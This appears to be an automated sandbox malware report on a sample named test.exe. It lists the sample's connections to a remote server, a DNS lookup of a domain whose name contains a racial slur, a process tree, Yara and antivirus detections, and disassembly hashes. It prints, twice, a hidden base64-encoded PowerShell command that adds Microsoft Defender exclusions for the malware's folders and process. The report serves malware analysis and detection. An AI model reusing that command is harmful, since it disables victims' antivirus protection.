                                                                    Dec 13, 2024 13:29:23.110774040 CET4987630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:23.113183975 CET4987630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:23.232911110 CET3012049876103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:23.232973099 CET4987630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:23.353107929 CET3012049876103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:24.724663019 CET3012049876103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:29:24.724792957 CET4987630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:26.872381926 CET4987630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:29:26.992280006 CET3012049876103.230.121.81192.168.2.9
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 13, 2024 13:27:27.717576027 CET5821553192.168.2.91.1.1.1
                                                                    Dec 13, 2024 13:27:27.855551004 CET53582151.1.1.1192.168.2.9
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 13, 2024 13:27:27.717576027 CET192.168.2.91.1.1.10x177dStandard query (0)iam.nigga.dadA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 13, 2024 13:27:27.855551004 CET1.1.1.1192.168.2.90x177dNo error (0)iam.nigga.dad103.230.121.81A (IP address)IN (0x0001)false

                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:07:27:18
                                                                    Start date:13/12/2024
                                                                    Path:C:\Users\user\Desktop\test.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\test.exe"
                                                                    Imagebase:0xba0000
                                                                    File size:604'672 bytes
                                                                    MD5 hash:59EAB4D3E8B7C383D6E963256CE603D8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1508460985.0000000004252000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1512992547.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1505562731.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:07:27:23
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                                                                    Imagebase:0x7ff760310000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:07:27:23
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:07:27:23
                                                                    Start date:13/12/2024
                                                                    Path:C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                    Imagebase:0xd70000
                                                                    File size:604'672 bytes
                                                                    MD5 hash:59EAB4D3E8B7C383D6E963256CE603D8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.1555656031.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:07:27:25
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Imagebase:0x770000
                                                                    File size:42'064 bytes
                                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2739969270.0000000003C96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2722239626.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:6
                                                                    Start time:07:27:25
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                                                                    Imagebase:0x7ff760310000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:07:27:25
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:07:27:29
                                                                    Start date:13/12/2024
                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                    Imagebase:0x7ff72d8c0000
                                                                    File size:496'640 bytes
                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:12
                                                                    Start time:07:28:01
                                                                    Start date:13/12/2024
                                                                    Path:C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                    Imagebase:0x6e0000
                                                                    File size:604'672 bytes
                                                                    MD5 hash:59EAB4D3E8B7C383D6E963256CE603D8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.2234027771.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.2217363905.000000000291D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:7.9%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:35%
                                                                      Total number of Nodes:40
                                                                      Total number of Limit Nodes:2
                                                                      execution_graph 76134 56b81a8 76135 56b81bd 76134->76135 76137 56b8511 76135->76137 76139 56b8521 76137->76139 76138 56b86d2 76138->76135 76139->76138 76143 57f27a0 76139->76143 76150 57f2792 76139->76150 76157 57f6783 76139->76157 76146 57f27ab 76143->76146 76144 57f29d1 76144->76139 76145 57f2838 KiUserExceptionDispatcher 76145->76146 76146->76144 76146->76145 76147 57f2acf LdrInitializeThunk 76146->76147 76148 57f29f0 LdrInitializeThunk 76146->76148 76149 57f2a00 LdrInitializeThunk 76146->76149 76147->76146 76148->76146 76149->76146 76153 57f27ab 76150->76153 76151 57f29d1 76151->76139 76152 57f2838 KiUserExceptionDispatcher 76152->76153 76153->76151 76153->76152 76154 57f2a00 LdrInitializeThunk 76153->76154 76155 57f2acf LdrInitializeThunk 76153->76155 76156 57f29f0 LdrInitializeThunk 76153->76156 76154->76153 76155->76153 76156->76153 76158 57f6799 76157->76158 76161 57f2a00 76158->76161 76164 57f2a22 76161->76164 76162 57f2a90 LdrInitializeThunk 76163 57f2aa6 76162->76163 76164->76162 76164->76163 76165 2eb6c08 76166 2eb6c0e 76165->76166 76167 2eb6c1c 76166->76167 76170 2eb7b96 76166->76170 76173 2eb74a0 76166->76173 76176 2ebf2e0 76170->76176 76175 2ebf2e0 VirtualProtect 76173->76175 76174 2eb74bc 76175->76174 76178 2ebf2f3 76176->76178 76180 2ebf398 76178->76180 76181 2ebf3e0 VirtualProtect 76180->76181 76183 2eb7bb8 76181->76183 76184 2ebf548 76185 2ebf588 CloseHandle 76184->76185 76187 2ebf5b9 76185->76187

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 396 57f29f0-57f2a1d 397 57f2a22-57f2a25 396->397 398 57f2a49-57f2a7f 397->398 399 57f2a27 397->399 404 57f2b13-57f2b20 398->404 399->398 400 57f2c1f 399->400 401 57f2c9e 399->401 402 57f2b57-57f2b6a 399->402 403 57f2cb3-57f2cc1 399->403 399->404 405 57f2b93-57f2ba1 399->405 406 57f2a90-57f2aa1 LdrInitializeThunk 399->406 407 57f2a2e-57f2a45 399->407 408 57f2b2c-57f2b3c 399->408 409 57f2ae4 399->409 410 57f2ce3-57f2cec 399->410 411 57f2ba3 399->411 412 57f2c02-57f2c19 399->412 413 57f2c81-57f2c98 399->413 414 57f2c75-57f2c78 400->414 424 57f2c9f 401->424 415 57f2b6c-57f2b70 402->415 444 57f2cc8-57f2cd6 403->444 404->409 438 57f2b22-57f2b27 404->438 431 57f2b87-57f2b8a 405->431 422 57f2aa6-57f2aca 406->422 407->397 416 57f2a47 407->416 408->404 439 57f2b3e-57f2b4c 408->439 425 57f2aec-57f2aee 409->425 420 57f2bf6-57f2bf9 411->420 412->420 435 57f2c1b-57f2c1d 412->435 413->414 433 57f2c9a-57f2c9c 413->433 414->401 419 57f2c7a 414->419 415->405 429 57f2b72-57f2b83 415->429 416->397 419->401 419->413 420->412 432 57f2bfb 420->432 422->415 424->424 436 57f2b06-57f2b0e 425->436 437 57f2af0-57f2af6 425->437 429->431 440 57f2b85 429->440 431->405 446 57f2b8c 431->446 432->400 432->401 432->412 432->413 433->414 435->420 443 57f2a84-57f2a87 436->443 441 57f2afa-57f2afc 437->441 442 57f2af8 437->442 438->443 439->443 445 57f2b52 439->445 440->431 441->436 442->436 443->409 449 57f2a89 443->449 444->397 450 57f2cdc-57f2cde 444->450 445->443 446->400 446->401 446->405 446->411 446->412 446->413 449->400 449->401 449->402 449->404 449->405 449->406 449->408 449->409 449->411 449->412 449->413 450->397 450->410
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 28781f5792e72082eabef89a340d9184c1091c8157a0fcf24344074ae3e8a76d
                                                                      • Instruction ID: c65c90b927985160b96f7cf681f2701def312396e72a219573c27688d98e6f4d
                                                                      • Opcode Fuzzy Hash: 28781f5792e72082eabef89a340d9184c1091c8157a0fcf24344074ae3e8a76d
                                                                      • Instruction Fuzzy Hash: 4251AF38A04105CFDB24CF64DD48BAA77B3FB88315F204079DA02AB796DB789D81EB55

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 506 57f2792-57f27a6 507 57f27ab-57f27ae 506->507 508 57f27b4 507->508 509 57f29d1-57f29da 507->509 508->509 510 57f29af-57f29b6 508->510 511 57f27bb-57f27eb 508->511 510->509 512 57f29b8-57f29c6 510->512 542 57f27ed call 57f2acf 511->542 543 57f27ed call 57f29f0 511->543 544 57f27ed call 57f2a00 511->544 512->507 513 57f29cc 512->513 513->507 516 57f27f3-57f2893 KiUserExceptionDispatcher 549 57f2895 call 57f2acf 516->549 550 57f2895 call 57f29f0 516->550 551 57f2895 call 57f2a00 516->551 524 57f289b-57f28ef 552 57f28f1 call 57f2acf 524->552 553 57f28f1 call 57f29f0 524->553 554 57f28f1 call 57f2a00 524->554 529 57f28f7-57f294b 545 57f294d call 57f2acf 529->545 546 57f294d call 57f29f0 529->546 547 57f294d call 57f2a00 529->547 534 57f2953-57f2984 call 57f6278 539 57f298c-57f29a2 534->539 539->507 541 57f29a8-57f29aa 539->541 541->507 542->516 543->516 544->516 545->534 546->534 547->534 549->524 550->524 551->524 552->529 553->529 554->529
                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 057F283C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: a0b6691a3aa8f3aef2ebfd74212c04af5862af513351dad2b98f2161b2036aa2
                                                                      • Instruction ID: a37c2cb7289d408d5b61bb89159eab7b943fdbf82fe7d97d3c35ab3fc32bddc9
                                                                      • Opcode Fuzzy Hash: a0b6691a3aa8f3aef2ebfd74212c04af5862af513351dad2b98f2161b2036aa2
                                                                      • Instruction Fuzzy Hash: CD516C39B401108FDB44DF78E899FAA33E2EB8C252B460179D54ADB352DE389D81CB94

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 555 57f27a0-57f27a6 556 57f27ab-57f27ae 555->556 557 57f27b4 556->557 558 57f29d1-57f29da 556->558 557->558 559 57f29af-57f29b6 557->559 560 57f27bb-57f27eb 557->560 559->558 561 57f29b8-57f29c6 559->561 598 57f27ed call 57f2acf 560->598 599 57f27ed call 57f29f0 560->599 600 57f27ed call 57f2a00 560->600 561->556 562 57f29cc 561->562 562->556 565 57f27f3-57f2893 KiUserExceptionDispatcher 592 57f2895 call 57f2acf 565->592 593 57f2895 call 57f29f0 565->593 594 57f2895 call 57f2a00 565->594 573 57f289b-57f28ef 595 57f28f1 call 57f2acf 573->595 596 57f28f1 call 57f29f0 573->596 597 57f28f1 call 57f2a00 573->597 578 57f28f7-57f294b 601 57f294d call 57f2acf 578->601 602 57f294d call 57f29f0 578->602 603 57f294d call 57f2a00 578->603 583 57f2953-57f2984 call 57f6278 588 57f298c-57f29a2 583->588 588->556 590 57f29a8-57f29aa 588->590 590->556 592->573 593->573 594->573 595->578 596->578 597->578 598->565 599->565 600->565 601->583 602->583 603->583
                                                                      APIs
                                                                      • KiUserExceptionDispatcher.NTDLL ref: 057F283C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: DispatcherExceptionUser
                                                                      • String ID:
                                                                      • API String ID: 6842923-0
                                                                      • Opcode ID: f3cfbd44dd1ef18647fa90b70f7ffe160b5e5bf586a2e83baf9788d2c1bb9504
                                                                      • Instruction ID: 25d28999418f37c5c44ec77d62fd604b088f0ca02295b0d2ce8cbca1f06f319d
                                                                      • Opcode Fuzzy Hash: f3cfbd44dd1ef18647fa90b70f7ffe160b5e5bf586a2e83baf9788d2c1bb9504
                                                                      • Instruction Fuzzy Hash: 12514C39B401108FDB44DF78E898FAB33E2EB8C252B460079D54ADB356DE789D81CB95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 745 57f4d70-57f4dd6 747 57f4dd8-57f4de3 745->747 748 57f4e20-57f4e22 745->748 747->748 750 57f4de5-57f4df1 747->750 749 57f4e24-57f4e7c 748->749 759 57f4e7e-57f4e89 749->759 760 57f4ec6-57f4ec8 749->760 751 57f4e14-57f4e1e 750->751 752 57f4df3-57f4dfd 750->752 751->749 754 57f4dff 752->754 755 57f4e01-57f4e10 752->755 754->755 755->755 756 57f4e12 755->756 756->751 759->760 762 57f4e8b-57f4e97 759->762 761 57f4eca-57f4ee2 760->761 769 57f4f2c-57f4f2e 761->769 770 57f4ee4-57f4eef 761->770 763 57f4eba-57f4ec4 762->763 764 57f4e99-57f4ea3 762->764 763->761 766 57f4ea7-57f4eb6 764->766 767 57f4ea5 764->767 766->766 768 57f4eb8 766->768 767->766 768->763 772 57f4f30-57f4f7e 769->772 770->769 771 57f4ef1-57f4efd 770->771 773 57f4eff-57f4f09 771->773 774 57f4f20-57f4f2a 771->774 780 57f4f84-57f4f92 772->780 776 57f4f0d-57f4f1c 773->776 777 57f4f0b 773->777 774->772 776->776 778 57f4f1e 776->778 777->776 778->774 781 57f4f9b-57f4ffb 780->781 782 57f4f94-57f4f9a 780->782 789 57f4ffd-57f5001 781->789 790 57f500b-57f500f 781->790 782->781 789->790 791 57f5003 789->791 792 57f501f-57f5023 790->792 793 57f5011-57f5015 790->793 791->790 795 57f5025-57f5029 792->795 796 57f5033-57f5037 792->796 793->792 794 57f5017 793->794 794->792 795->796 797 57f502b 795->797 798 57f5039-57f503d 796->798 799 57f5047-57f504b 796->799 797->796 798->799 802 57f503f 798->802 800 57f504d-57f5051 799->800 801 57f505b-57f505f 799->801 800->801 803 57f5053 800->803 804 57f506f 801->804 805 57f5061-57f5065 801->805 802->799 803->801 807 57f5070 804->807 805->804 806 57f5067 805->806 806->804 807->807
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \Vwn
                                                                      • API String ID: 0-47881834
                                                                      • Opcode ID: 5da95666a7fbf1a551fe1c727c836d36134f469b0a32bc7717e515c51b5aea50
                                                                      • Instruction ID: 6575b05571c4516c792bf030e508b10080ee33f934e502b6b2f7b48f99b95d8f
                                                                      • Opcode Fuzzy Hash: 5da95666a7fbf1a551fe1c727c836d36134f469b0a32bc7717e515c51b5aea50
                                                                      • Instruction Fuzzy Hash: B4916C70E00209DFDF10CFA8D984BAEBBF2BF88314F148129E509A7354EB759885DB81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12c9482e2b8d93a73c5e4903751adc2b733a577da39381aaefe469575e5c2a1d
                                                                      • Instruction ID: b9f9423b4fb3ff75d5c52b0b748f9ec793ebace6f3b20d65ba1dcd32b821ac52
                                                                      • Opcode Fuzzy Hash: 12c9482e2b8d93a73c5e4903751adc2b733a577da39381aaefe469575e5c2a1d
                                                                      • Instruction Fuzzy Hash: B8B2F535A00218DFDB14CFA4C998BADB7B6FF89710F158199E506AB3A5DB70AC81CF50

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1519 56a37e8-56a3802 1520 56a380e-56a381a 1519->1520 1521 56a3804-56a380b 1519->1521 1523 56a381c-56a3829 1520->1523 1524 56a3876-56a3879 1520->1524 1531 56a382f-56a385f 1523->1531 1532 56a3a47-56a3a7f 1523->1532 1525 56a387b-56a387d 1524->1525 1526 56a388c-56a388f 1524->1526 1690 56a387f call 56a37e8 1525->1690 1691 56a387f call 56a3aa8 1525->1691 1692 56a387f call 56a37d9 1525->1692 1528 56a3891-56a38af 1526->1528 1529 56a38b5-56a38b8 1526->1529 1528->1529 1538 56a3a86-56a3ad1 1528->1538 1533 56a38be-56a38c4 1529->1533 1534 56a3a3d-56a3a44 1529->1534 1530 56a3885 1530->1526 1562 56a386c-56a386f 1531->1562 1563 56a3861-56a386a 1531->1563 1532->1538 1533->1534 1536 56a38ca-56a38d3 1533->1536 1544 56a390b-56a3911 1536->1544 1545 56a38d5-56a38e4 1536->1545 1567 56a3b0a-56a3b0c 1538->1567 1568 56a3ad3-56a3ae0 1538->1568 1546 56a3a1c-56a3a22 1544->1546 1547 56a3917-56a3920 1544->1547 1545->1544 1553 56a38e6-56a38ff 1545->1553 1546->1534 1549 56a3a24-56a3a34 1546->1549 1547->1546 1558 56a3926-56a3932 1547->1558 1549->1534 1561 56a3a36-56a3a3b 1549->1561 1553->1544 1564 56a3901-56a3904 1553->1564 1569 56a3938-56a3960 1558->1569 1570 56a39d0-56a3a14 1558->1570 1561->1534 1562->1524 1563->1524 1564->1544 1571 56a3f57-56a3f5e 1567->1571 1568->1567 1575 56a3ae2-56a3b08 1568->1575 1569->1570 1582 56a3962-56a399f 1569->1582 1570->1546 1575->1567 1587 56a3b11-56a3b45 1575->1587 1582->1570 1594 56a39a1-56a39ce 1582->1594 1595 56a3b4b-56a3b54 1587->1595 1596 56a3be8-56a3bf7 1587->1596 1594->1546 1597 56a3b5a-56a3b6d 1595->1597 1598 56a3f5f-56a3f6a 1595->1598 1604 56a3bf9-56a3c0f 1596->1604 1605 56a3c36 1596->1605 1607 56a3b6f-56a3b88 1597->1607 1608 56a3bd6-56a3be2 1597->1608 1614 56a3c2f-56a3c34 1604->1614 1615 56a3c11-56a3c2d 1604->1615 1606 56a3c38-56a3c3d 1605->1606 1609 56a3c3f-56a3c44 1606->1609 1610 56a3c80-56a3c9c 1606->1610 1607->1608 1624 56a3b8a-56a3b98 1607->1624 1608->1595 1608->1596 1616 56a3c4c-56a3c60 1609->1616 1620 56a3ca2-56a3cab 1610->1620 1621 56a3d64-56a3d6d 1610->1621 1614->1606 1615->1606 1616->1610 1628 56a3c62 1616->1628 1620->1598 1627 56a3cb1-56a3cce 1620->1627 1625 56a3d73 1621->1625 1626 56a3f55 1621->1626 1624->1608 1639 56a3b9a-56a3b9e 1624->1639 1629 56a3d7a-56a3d7c 1625->1629 1630 56a3dde-56a3dec call 56a1408 1625->1630 1631 56a3d81-56a3d8f call 56a1408 1625->1631 1626->1571 1648 56a3d52-56a3d5e 1627->1648 1649 56a3cd4-56a3cea 1627->1649 1634 56a3c65-56a3c7e 1628->1634 1629->1571 1643 56a3dee-56a3df6 1630->1643 1644 56a3e04-56a3e1b call 56a1408 1630->1644 1640 56a3d91-56a3d99 1631->1640 1641 56a3da7-56a3dae 1631->1641 1634->1610 1639->1598 1646 56a3ba4-56a3bbd 1639->1646 1640->1641 1641->1571 1643->1644 1657 56a3e1d-56a3e25 1644->1657 1658 56a3e33-56a3e46 call 56a1408 1644->1658 1646->1608 1663 56a3bbf-56a3bd3 call 56a0238 1646->1663 1648->1620 1648->1621 1649->1648 1666 56a3cec-56a3cfa 1649->1666 1657->1658 1668 56a3e48-56a3e50 1658->1668 1669 56a3e5e-56a3e7b call 56a1408 1658->1669 1663->1608 1666->1648 1674 56a3cfc-56a3d00 1666->1674 1668->1669 1680 56a3e7d-56a3e85 1669->1680 1681 56a3e93 1669->1681 1674->1598 1676 56a3d06-56a3d2f 1674->1676 1676->1648 1685 56a3d31-56a3d4f call 56a0238 1676->1685 1680->1681 1681->1571 1685->1648 1690->1530 1691->1530 1692->1530
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 811521f97fe0a00196ecd391e0ce5e52982169fd216a43503d4a4913440f0ba7
                                                                      • Instruction ID: 961d1ad125d6c5d85be41bf22378b6fd2872d875a416b07bfeb672c05f2eaace
                                                                      • Opcode Fuzzy Hash: 811521f97fe0a00196ecd391e0ce5e52982169fd216a43503d4a4913440f0ba7
                                                                      • Instruction Fuzzy Hash: A722F335B00205CFDB14DF69C984A6ABBF2BF89711B1588A9E506DB7A1DB31EC41CF50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 214dace36a71441f051f1ecf10a506134228466ea628ee46769f1fc8e9ba0042
                                                                      • Instruction ID: 44f6afe09d972e25f71aebffc7682e91b157d70ad223d9d6c3ec88bc1b3f3963
                                                                      • Opcode Fuzzy Hash: 214dace36a71441f051f1ecf10a506134228466ea628ee46769f1fc8e9ba0042
                                                                      • Instruction Fuzzy Hash: F322FB35A00218CFDB24DFA4C998BADB7B2FF49310F1481A9E509AB795DB71AD81CF50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e7b4f19a3d7c648f55545cae38e1d8a7076cbbc46c52a8fa6c0aeebc1274a629
                                                                      • Instruction ID: 153bf4aea74756182b99765b5b281e35d198f5a65c5cb638e63d0a637d7f7177
                                                                      • Opcode Fuzzy Hash: e7b4f19a3d7c648f55545cae38e1d8a7076cbbc46c52a8fa6c0aeebc1274a629
                                                                      • Instruction Fuzzy Hash: B9023570B002168FDB19CFA9C4A4A7EFBF2BF88300F648529D65AD7341DB70A941DB95
                                                                      Memory Dump Source
